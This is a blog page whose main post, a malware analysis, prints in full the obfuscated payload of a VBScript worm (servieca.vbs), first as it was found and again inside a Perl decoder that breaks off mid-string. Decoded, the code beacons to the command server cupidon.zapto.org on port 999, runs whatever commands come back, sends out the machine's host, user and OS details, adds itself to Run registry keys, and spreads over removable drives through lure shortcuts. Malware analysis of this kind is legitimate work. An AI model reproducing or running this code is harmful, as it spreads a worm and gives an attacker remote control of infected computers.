2013/11/20

Blocking ad sites for privacy and bandwidth :)

I came up with an excellent idea: start collecting URLs that serve ads and block them, as they are usually a waste of time and bandwidth and are usually used to collect private data from us. So I created a project that will end up as a very nice and easy-to-use proxy app for controlling all ads on any device. This is the beginning of a beautiful era.

The project is here: https://github.com/laudarch/AdControlla, just in case you want to see or use it. It can also be used on any firewall that you currently have, at least until we finish the apps :)

2013/05/24

Companies now research on their potential clients

I was recently asked to research an AAA and billing solution for the company to use in its sudden interest in
deploying Wi-Fi hotspots in the city. I turned to Verax Systems; now I've just logged on to my LinkedIn and there are some Verax
onlookers there. WTF?

2013/05/03

servieca.vbs - Reverse Engineered

Hello

So I came across a new virus/worm on one of the Statistical Services (http://www.statsghana.gov.gh)
computers; they have been infected by a guy called njq8 (https://twitter.com/njq8).

I don't know this guy, but I'll follow his tweets and watch his projects.
Anyway, here's the breakdown of the process I used.

First, the original file.

HOUDINI = "39|60|91|32|99|111|100|101|100|32|98|89|32|110|106|113|56|32|93|62|39|13|10|79|110|32|69|114|114|111|114|32|82|101|115|117|109|101|32|78|101|120|116|13|10|100|105|109|32|115|104|32|39|32|115|104|101|108|108|13|10|115|101|116|32|115|104|32|61|87|83|99|114|105|112|116|46|67|114|101|97|116|101|79|98|106|101|99|116|40|34|87|83|99|114|105|112|116|46|83|104|101|108|108|34|41|13|10|100|105|109|32|102|115|32|39|32|102|105|108|101|115|121|115|116|101|109|13|10|115|101|116|32|102|115|61|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|99|114|105|112|116|105|110|103|46|70|105|108|101|83|121|115|116|101|109|79|98|106|101|99|116|34|41|32|13|10|100|105|109|32|104|111|115|116|13|10|104|111|115|116|61|34|99|117|112|105|100|111|110|46|122|97|112|116|111|46|111|114|103|34|13|10|100|105|109|32|112|111|114|116|13|10|112|111|114|116|61|57|57|57|13|10|100|105|109|32|68|82|13|10|68|82|32|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|116|101|109|112|37|34|41|32|38|32|34|92|34|13|10|100|105|109|32|70|78|13|10|70|78|32|61|34|83|101|114|118|105|101|99|97|46|118|98|115|34|13|10|100|105|109|32|102|104|13|10|100|105|109|32|117|115|13|10|117|115|61|34|126|34|13|10|105|110|115|13|10|100|105|109|32|115|112|108|13|10|115|112|108|61|34|106|110|74|110|106|34|13|10|100|105|109|32|105|13|10|105|61|48|13|10|119|104|105|108|101|32|116|114|117|101|13|10|100|105|109|32|97|13|10|97|32|61|32|34|34|13|10|97|61|32|115|112|108|105|116|40|112|111|115|116|40|34|114|101|97|100|121|34|44|34|34|41|44|115|112|108|41|13|10|115|101|108|101|99|116|32|99|97|115|101|32|97|40|48|41|13|10|99|97|115|101|32|34|101|120|99|34|13|10|100|105|109|32|115|97|13|10|115|97|61|32|97|40|49|41|13|10|101|120|101|99|117|116|101|32|115|97|13|10|99|97|115|101|32|34|117|110|115|34|13|10|117|110|115|13|10|101|110|100|32|115|101|108|101|99|116|13|10|119|115|99|114|105|112|116|46|115|108|101|101|112|32|52|48|48|48|13|10|105|32|61|32|105|32|43|32|49|13|10|105|
102|32|105|62|32|50|32|116|104|101|110|13|10|105|61|48|13|10|120|105|110|115|13|10|101|110|100|32|105|102|13|10|119|101|110|100|13|10|13|10|102|117|110|99|116|105|111|110|32|105|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|117|115|61|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|67|85|92|110|106|113|56|34|41|13|10|105|102|32|117|115|61|34|126|34|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|109|105|100|40|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|50|41|41|61|34|58|92|34|32|38|32|32|108|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|117|115|61|34|121|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|110|106|113|56|34|44|32|32|117|115|44|32|34|82|69|71|95|83|90|34|13|10|101|108|115|101|13|10|117|115|61|34|110|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|110|106|113|56|34|44|32|32|117|115|44|32|34|82|69|71|95|83|90|34|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|69|114|114|46|67|108|101|97|114|13|10|102|115|46|67|111|112|121|70|105|108|101|32|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|100|114|32|38|32|102|110|32|44|116|114|117|101|13|10|115|101|116|32|102|104|32|61|32|102|115|46|79|112|101|110|84|101|120|116|70|105|108|101|40|32|100|114|32|38|32|102|110|44|32|56|44|32|102|97|108|115|101|41|13|10|105|102|32|32|69|114|114|46|78|117|109|98|101|114|62|48|32|116|104|101|110|13|10|119|115|99|114|105|112|116|46|113|117|105|116|13|10|101|110|100|32|105|102|13|10|120|105|110|115|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|115|117|98|32|120|105|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|11
6|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|44|32|32|99|104|114|119|40|51|52|41|32|38|32|100|114|32|38|32|102|110|32|38|32|99|104|114|119|40|51|52|41|44|32|34|82|69|71|95|83|90|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|76|77|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|44|32|32|99|104|114|119|40|51|52|41|32|38|32|100|114|32|38|32|102|110|32|38|32|99|104|114|119|40|51|52|41|44|32|34|82|69|71|95|83|90|34|13|10|102|115|46|99|111|112|121|102|105|108|101|32|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|32|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|104|101|108|108|46|65|112|112|108|105|99|97|116|105|111|110|34|41|46|78|97|109|101|83|112|97|99|101|40|38|72|55|41|46|83|101|108|102|46|80|97|116|104|32|38|34|92|34|32|38|32|102|110|32|44|116|114|117|101|13|10|102|111|114|32|101|97|99|104|32|120|120|32|105|110|32|102|115|46|68|114|105|118|101|115|13|10|105|102|32|120|120|46|105|115|114|101|97|100|121|32|116|104|101|110|13|10|105|102|32|120|120|46|70|114|101|101|83|112|97|99|101|32|62|48|32|116|104|101|110|13|10|105|102|32|120|120|46|100|114|105|118|101|116|121|112|101|61|49|32|116|104|101|110|13|10|105|102|32|102|115|46|102|105|108|101|101|120|105|115|116|115|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|102|110|41|32|116|104|101|110|13|10|102|115|46|103|101|116|102|105|108|101|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|102|110|41|46|65|116|116|114|105|98|117|116|101|115|61|48|13|10|101|110|100|32|105|102|13|10|102|115|46|99|111|112|121|102|105|108|101|32|100|114|32|38|32|102|110|32|44|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|102|110|44|116|114|117|101|13|10|70|111|114|32|69|97|99|104|32|120|32|73|110|32|102|115|46|71|101|116|70|111|108|100|101|114|40|32|120|120|46|112|97|116|104|32|38|32|34|9
2|34|32|41|46|70|105|108|101|115|13|10|119|115|99|114|105|112|116|46|115|108|101|101|112|32|49|13|10|105|102|32|105|110|115|116|114|40|120|46|110|97|109|101|44|34|46|34|41|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|41|60|62|34|108|110|107|34|32|116|104|101|110|13|10|120|46|65|116|116|114|105|98|117|116|101|115|32|61|32|50|13|10|105|102|32|117|99|97|115|101|40|120|46|110|97|109|101|41|32|60|62|32|117|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|87|105|116|104|32|115|104|46|67|114|101|97|116|101|83|104|111|114|116|99|117|116|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|120|46|110|97|109|101|32|38|32|34|46|108|110|107|34|41|32|13|10|46|84|97|114|103|101|116|80|97|116|104|32|61|32|34|99|109|100|46|101|120|101|34|13|10|46|87|111|114|107|105|110|103|68|105|114|101|99|116|111|114|121|32|61|32|34|34|13|10|46|65|114|103|117|109|101|110|116|115|32|61|32|34|47|99|32|115|116|97|114|116|32|34|32|38|32|82|101|112|108|97|99|101|40|102|110|44|34|32|34|44|32|67|104|114|87|40|51|52|41|32|95|13|10|38|32|34|32|34|32|38|32|67|104|114|87|40|51|52|41|41|32|38|32|34|38|115|116|97|114|116|32|34|32|38|32|114|101|112|108|97|99|101|40|32|120|46|110|97|109|101|44|34|32|34|44|32|67|104|114|87|40|51|52|41|32|38|32|34|32|34|32|38|32|67|104|114|87|40|51|52|41|41|32|38|32|34|32|38|32|101|120|105|116|34|13|10|46|73|99|111|110|76|111|99|97|116|105|111|110|32|61|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|76|77|92|83|79|70|84|87|65|82|69|92|67|108|97|115|115|101|115|92|34|32|38|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|76|77|92|83|79|70|84|87|65|82|69|92|67|108|97|115|115|101|115|92|46|34|32|38|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|32|38|32|34|92|34|41|32|38|32|34|92|6
8|101|102|97|117|108|116|73|99|111|110|92|34|41|13|10|105|102|32|105|110|115|116|114|40|32|46|105|99|111|110|108|111|99|97|116|105|111|110|44|34|44|34|41|61|48|32|116|104|101|110|13|10|46|105|99|111|110|108|111|99|97|116|105|111|110|32|61|32|46|105|99|111|110|108|111|99|97|116|105|111|110|32|38|34|44|48|34|13|10|101|110|100|32|105|102|13|10|46|83|97|118|101|40|41|13|10|101|110|100|32|119|105|116|104|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|110|101|120|116|13|10|69|114|114|46|67|108|101|97|114|13|10|101|110|100|32|115|117|98|13|10|13|10|102|117|110|99|116|105|111|110|32|117|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|102|104|46|99|108|111|115|101|13|10|115|104|46|82|101|103|68|101|108|101|116|101|32|34|72|75|67|85|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|13|10|115|104|46|82|101|103|68|101|108|101|116|101|32|34|72|75|76|77|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|13|10|102|115|46|68|101|108|101|116|101|70|105|108|101|32|100|114|32|38|32|102|110|32|44|116|114|117|101|13|10|102|115|46|68|101|108|101|116|101|70|105|108|101|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|104|101|108|108|46|65|112|112|108|105|99|97|116|105|111|110|34|41|46|78|97|109|101|83|112|97|99|101|40|38|72|55|41|46|83|101|108|102|46|80|97|116|104|32|38|34|92|34|32|38|32|102|110|32|44|116|114|117|101|13|10|102|111|114|32|101|97|99|104|32|120|120|32|105|110|32|102|115|46|68|114|105|118|101|115|13|10|105|102|32|120|120|46|105|115|114|101|97|100|121|32|116|104|101|110|13|10|105|102|32|120
|120|46|70|114|101|101|83|112|97|99|101|32|62|48|32|116|104|101|110|13|10|70|111|114|32|69|97|99|104|32|120|32|73|110|32|102|115|46|71|101|116|70|111|108|100|101|114|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|41|46|70|105|108|101|115|13|10|79|110|32|69|114|114|111|114|32|82|101|115|117|109|101|32|78|101|120|116|13|10|105|102|32|105|110|115|116|114|40|120|46|110|97|109|101|44|34|46|34|41|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|41|60|62|34|108|110|107|34|32|116|104|101|110|13|10|120|46|65|116|116|114|105|98|117|116|101|115|32|61|32|48|13|10|105|102|32|117|99|97|115|101|40|120|46|110|97|109|101|41|32|60|62|32|117|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|102|115|46|100|101|108|101|116|101|102|105|108|101|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|120|46|110|97|109|101|32|38|32|34|46|108|110|107|34|32|41|13|10|101|108|115|101|13|10|102|115|46|100|101|108|101|116|101|102|105|108|101|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|120|46|110|97|109|101|32|41|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|110|101|120|116|13|10|119|115|99|114|105|112|116|46|113|117|105|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|102|117|110|99|116|105|111|110|32|112|111|115|116|40|99|109|100|32|44|100|97|41|13|10|112|111|115|116|61|34|34|13|10|68|105|109|32|111|13|10|83|101|116|32|111|32|61|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|77|83|88|77|76|50|46|88|77|76|72|84|84|80|34|41|13|10|111|46|111|112|101|110|32|34|80|79|83|84|34|44|34|104|116|116|112|58|47|47|34|32|38|32|104|111|115|116|32|38|32|34|58|34|32|38|32|112|111|114|116|32|38|34|47|34|32|38|32|99|109|100|44|32|102|97|108|115|101|13|10|111|46|115|101|116|82|101|
113|117|101|115|116|72|101|97|100|101|114|32|34|85|115|101|114|45|65|103|101|110|116|58|34|44|32|32|105|110|102|13|10|111|46|115|101|110|100|32|100|97|13|10|112|111|115|116|61|111|46|114|101|115|112|111|110|115|101|84|101|120|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|100|105|109|32|120|105|110|102|13|10|102|117|110|99|116|105|111|110|32|105|110|102|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|105|102|32|120|105|110|102|61|34|34|32|116|104|101|110|13|10|100|105|109|32|115|13|10|115|61|34|63|63|34|13|10|115|32|61|32|104|119|100|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|115|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|67|79|77|80|85|84|69|82|78|65|77|69|37|34|41|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|115|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|85|83|69|82|78|65|77|69|37|34|41|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|83|101|116|32|97|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|123|105|109|112|101|114|115|111|110|97|116|105|111|110|76|101|118|101|108|61|105|109|112|101|114|115|111|110|97|116|101|125|33|92|92|46|92|114|111|111|116|92|99|105|109|118|50|34|41|13|10|83|101|116|32|97|97|32|61|32|97|46|69|120|101|99|81|117|101|114|121|32|40|34|83|101|108|101|99|116|32|42|32|102|114|111|109|32|87|105|110|51|50|95|79|112|101|114|97|116|105|110|103|83|121|115|116|101|109|34|41|13|10|70|111|114|32|69|97|99|104|32|97|97|97|32|105|110|32|97|97|13|10|115|61|32|97|97|97|46|67|97|112|116|105|111|110|32|32|13|10|101|120|105|116|32|102|111|114|13|10|78|101|120|116|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|48|46|51|92|34|32|38|32|11
2|105|100|32|32|13|10|120|105|110|102|61|105|110|102|13|10|101|108|115|101|13|10|105|110|102|61|120|105|110|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|102|117|110|99|116|105|111|110|32|72|87|68|13|10|83|101|116|32|97|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|123|105|109|112|101|114|115|111|110|97|116|105|111|110|76|101|118|101|108|61|105|109|112|101|114|115|111|110|97|116|101|125|33|92|92|46|92|114|111|111|116|92|99|105|109|118|50|34|41|13|10|83|101|116|32|97|97|32|61|32|97|46|69|120|101|99|81|117|101|114|121|40|34|83|69|76|69|67|84|32|42|32|70|82|79|77|32|87|105|110|51|50|95|76|111|103|105|99|97|108|68|105|115|107|34|41|13|10|70|111|114|32|69|97|99|104|32|97|97|97|32|73|110|32|97|97|13|10|105|102|32|97|97|97|46|86|111|108|117|109|101|83|101|114|105|97|108|78|117|109|98|101|114|60|62|34|34|32|116|104|101|110|13|10|72|87|68|61|32|97|97|97|46|86|111|108|117|109|101|83|101|114|105|97|108|78|117|109|98|101|114|13|10|101|120|105|116|32|102|111|114|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|70|117|110|99|116|105|111|110|32|80|73|68|13|10|80|73|68|61|48|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|80|73|68|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|114|111|111|116|92|99|105|109|118|50|34|41|46|71|101|116|40|34|87|105|110|51|50|95|34|32|38|95|13|10|34|80|114|111|99|101|115|115|46|72|97|110|100|108|101|61|39|34|32|38|32|95|13|10|115|104|46|69|120|101|99|40|34|109|115|104|116|97|46|101|120|101|34|41|46|80|114|111|99|101|115|115|73|68|32|38|32|34|39|34|41|46|80|97|114|101|110|116|80|114|111|99|101|115|115|73|100|13|10|69|110|100|32|70|117|110|99|116|105|111|110|"
HOUDINI = SPLIT(HOUDINI,"|")
FOR I = 0 TO UBOUND(HOUDINI) -1
NJ = NJ & CHR(HOUDINI(I))
NEXT
EXECUTE (NJ)

Well, from that we all know the en/decryption is the same routine:
FOR I = 0 TO UBOUND(HOUDINI) -1
NJ = NJ & CHR(HOUDINI(I))
NEXT

So here's my reverse script in Perl:

#!/usr/bin/perl

$HOUDINI = "39|60|91|32|99|111|100|101|100|32|98|89|32|110|106|113|56|32|93|62|39|13|10|79|110|32|69|114|114|111|114|32|82|101|115|117|109|101|32|78|101|120|116|13|10|100|105|109|32|115|104|32|39|32|115|104|101|108|108|13|10|115|101|116|32|115|104|32|61|87|83|99|114|105|112|116|46|67|114|101|97|116|101|79|98|106|101|99|116|40|34|87|83|99|114|105|112|116|46|83|104|101|108|108|34|41|13|10|100|105|109|32|102|115|32|39|32|102|105|108|101|115|121|115|116|101|109|13|10|115|101|116|32|102|115|61|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|99|114|105|112|116|105|110|103|46|70|105|108|101|83|121|115|116|101|109|79|98|106|101|99|116|34|41|32|13|10|100|105|109|32|104|111|115|116|13|10|104|111|115|116|61|34|99|117|112|105|100|111|110|46|122|97|112|116|111|46|111|114|103|34|13|10|100|105|109|32|112|111|114|116|13|10|112|111|114|116|61|57|57|57|13|10|100|105|109|32|68|82|13|10|68|82|32|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|116|101|109|112|37|34|41|32|38|32|34|92|34|13|10|100|105|109|32|70|78|13|10|70|78|32|61|34|83|101|114|118|105|101|99|97|46|118|98|115|34|13|10|100|105|109|32|102|104|13|10|100|105|109|32|117|115|13|10|117|115|61|34|126|34|13|10|105|110|115|13|10|100|105|109|32|115|112|108|13|10|115|112|108|61|34|106|110|74|110|106|34|13|10|100|105|109|32|105|13|10|105|61|48|13|10|119|104|105|108|101|32|116|114|117|101|13|10|100|105|109|32|97|13|10|97|32|61|32|34|34|13|10|97|61|32|115|112|108|105|116|40|112|111|115|116|40|34|114|101|97|100|121|34|44|34|34|41|44|115|112|108|41|13|10|115|101|108|101|99|116|32|99|97|115|101|32|97|40|48|41|13|10|99|97|115|101|32|34|101|120|99|34|13|10|100|105|109|32|115|97|13|10|115|97|61|32|97|40|49|41|13|10|101|120|101|99|117|116|101|32|115|97|13|10|99|97|115|101|32|34|117|110|115|34|13|10|117|110|115|13|10|101|110|100|32|115|101|108|101|99|116|13|10|119|115|99|114|105|112|116|46|115|108|101|101|112|32|52|48|48|48|13|10|105|32|61|32|105|32|43|32|49|13|10|105
|102|32|105|62|32|50|32|116|104|101|110|13|10|105|61|48|13|10|120|105|110|115|13|10|101|110|100|32|105|102|13|10|119|101|110|100|13|10|13|10|102|117|110|99|116|105|111|110|32|105|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|117|115|61|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|67|85|92|110|106|113|56|34|41|13|10|105|102|32|117|115|61|34|126|34|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|109|105|100|40|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|50|41|41|61|34|58|92|34|32|38|32|32|108|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|117|115|61|34|121|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|110|106|113|56|34|44|32|32|117|115|44|32|34|82|69|71|95|83|90|34|13|10|101|108|115|101|13|10|117|115|61|34|110|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|110|106|113|56|34|44|32|32|117|115|44|32|34|82|69|71|95|83|90|34|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|69|114|114|46|67|108|101|97|114|13|10|102|115|46|67|111|112|121|70|105|108|101|32|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|100|114|32|38|32|102|110|32|44|116|114|117|101|13|10|115|101|116|32|102|104|32|61|32|102|115|46|79|112|101|110|84|101|120|116|70|105|108|101|40|32|100|114|32|38|32|102|110|44|32|56|44|32|102|97|108|115|101|41|13|10|105|102|32|32|69|114|114|46|78|117|109|98|101|114|62|48|32|116|104|101|110|13|10|119|115|99|114|105|112|116|46|113|117|105|116|13|10|101|110|100|32|105|102|13|10|120|105|110|115|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|115|117|98|32|120|105|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|67|85|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|1
16|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|44|32|32|99|104|114|119|40|51|52|41|32|38|32|100|114|32|38|32|102|110|32|38|32|99|104|114|119|40|51|52|41|44|32|34|82|69|71|95|83|90|34|13|10|115|104|46|114|101|103|119|114|105|116|101|32|34|72|75|76|77|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|44|32|32|99|104|114|119|40|51|52|41|32|38|32|100|114|32|38|32|102|110|32|38|32|99|104|114|119|40|51|52|41|44|32|34|82|69|71|95|83|90|34|13|10|102|115|46|99|111|112|121|102|105|108|101|32|119|115|99|114|105|112|116|46|115|99|114|105|112|116|102|117|108|108|110|97|109|101|44|32|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|104|101|108|108|46|65|112|112|108|105|99|97|116|105|111|110|34|41|46|78|97|109|101|83|112|97|99|101|40|38|72|55|41|46|83|101|108|102|46|80|97|116|104|32|38|34|92|34|32|38|32|102|110|32|44|116|114|117|101|13|10|102|111|114|32|101|97|99|104|32|120|120|32|105|110|32|102|115|46|68|114|105|118|101|115|13|10|105|102|32|120|120|46|105|115|114|101|97|100|121|32|116|104|101|110|13|10|105|102|32|120|120|46|70|114|101|101|83|112|97|99|101|32|62|48|32|116|104|101|110|13|10|105|102|32|120|120|46|100|114|105|118|101|116|121|112|101|61|49|32|116|104|101|110|13|10|105|102|32|102|115|46|102|105|108|101|101|120|105|115|116|115|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|102|110|41|32|116|104|101|110|13|10|102|115|46|103|101|116|102|105|108|101|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|102|110|41|46|65|116|116|114|105|98|117|116|101|115|61|48|13|10|101|110|100|32|105|102|13|10|102|115|46|99|111|112|121|102|105|108|101|32|100|114|32|38|32|102|110|32|44|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|102|110|44|116|114|117|101|13|10|70|111|114|32|69|97|99|104|32|120|32|73|110|32|102|115|46|71|101|116|70|111|108|100|101|114|40|32|120|120|46|112|97|116|104|32|38|32|34|
92|34|32|41|46|70|105|108|101|115|13|10|119|115|99|114|105|112|116|46|115|108|101|101|112|32|49|13|10|105|102|32|105|110|115|116|114|40|120|46|110|97|109|101|44|34|46|34|41|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|41|60|62|34|108|110|107|34|32|116|104|101|110|13|10|120|46|65|116|116|114|105|98|117|116|101|115|32|61|32|50|13|10|105|102|32|117|99|97|115|101|40|120|46|110|97|109|101|41|32|60|62|32|117|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|87|105|116|104|32|115|104|46|67|114|101|97|116|101|83|104|111|114|116|99|117|116|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|32|38|32|120|46|110|97|109|101|32|38|32|34|46|108|110|107|34|41|32|13|10|46|84|97|114|103|101|116|80|97|116|104|32|61|32|34|99|109|100|46|101|120|101|34|13|10|46|87|111|114|107|105|110|103|68|105|114|101|99|116|111|114|121|32|61|32|34|34|13|10|46|65|114|103|117|109|101|110|116|115|32|61|32|34|47|99|32|115|116|97|114|116|32|34|32|38|32|82|101|112|108|97|99|101|40|102|110|44|34|32|34|44|32|67|104|114|87|40|51|52|41|32|95|13|10|38|32|34|32|34|32|38|32|67|104|114|87|40|51|52|41|41|32|38|32|34|38|115|116|97|114|116|32|34|32|38|32|114|101|112|108|97|99|101|40|32|120|46|110|97|109|101|44|34|32|34|44|32|67|104|114|87|40|51|52|41|32|38|32|34|32|34|32|38|32|67|104|114|87|40|51|52|41|41|32|38|32|34|32|38|32|101|120|105|116|34|13|10|46|73|99|111|110|76|111|99|97|116|105|111|110|32|61|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|76|77|92|83|79|70|84|87|65|82|69|92|67|108|97|115|115|101|115|92|34|32|38|32|115|104|46|114|101|103|114|101|97|100|40|34|72|75|76|77|92|83|79|70|84|87|65|82|69|92|67|108|97|115|115|101|115|92|46|34|32|38|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|32|38|32|34|92|34|41|32|38|32|34|92|
68|101|102|97|117|108|116|73|99|111|110|92|34|41|13|10|105|102|32|105|110|115|116|114|40|32|46|105|99|111|110|108|111|99|97|116|105|111|110|44|34|44|34|41|61|48|32|116|104|101|110|13|10|46|105|99|111|110|108|111|99|97|116|105|111|110|32|61|32|46|105|99|111|110|108|111|99|97|116|105|111|110|32|38|34|44|48|34|13|10|101|110|100|32|105|102|13|10|46|83|97|118|101|40|41|13|10|101|110|100|32|119|105|116|104|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|110|101|120|116|13|10|69|114|114|46|67|108|101|97|114|13|10|101|110|100|32|115|117|98|13|10|13|10|102|117|110|99|116|105|111|110|32|117|110|115|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|102|104|46|99|108|111|115|101|13|10|115|104|46|82|101|103|68|101|108|101|116|101|32|34|72|75|67|85|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|13|10|115|104|46|82|101|103|68|101|108|101|116|101|32|34|72|75|76|77|92|83|111|102|116|119|97|114|101|92|77|105|99|114|111|115|111|102|116|92|87|105|110|100|111|119|